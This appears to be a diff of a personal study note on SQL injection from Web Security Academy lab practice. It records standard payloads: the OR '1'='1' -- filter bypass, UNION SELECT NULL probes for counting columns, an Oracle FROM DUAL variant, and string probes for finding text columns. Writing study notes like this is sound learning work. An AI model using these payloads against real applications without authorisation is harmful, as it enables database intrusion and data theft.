0x5900FX/Note-Garden/content/Web Security Academy/SQL Injection.md

 - `SELECT` statements, within the `ORDER BY` clause

 `SELECT * FROM products WHERE category = 'Gifts' AND released = 1`
- Can add OR '1'='1' --
+`OR '1'='1' --`
 `SELECT * FROM products WHERE category = 'Gifts' OR'1'='1' -- AND released = 1`

 `Union` attacks allows us to execute one or more `SELECT` queries and append result to original query.

 `SELECT a, b FROM table1 UNION SELECT c, d FROM table2`

-Union attack requirements
-- Returns same number of columns.
+Find number of columns in using UNION.
-- Data types must be companiable.
+`UNION SELECT NULL-- `

+DB specific syntax.
+Oracle -> `' UNION SELECT NULL FROM DUAL--`

+Find column to a data type
+`' UNION SELECT NULL,'a',NULL,NULL--`
+`' UNION select NULL, 'CqPDHh', NULL  --`

 ```
 Payloads List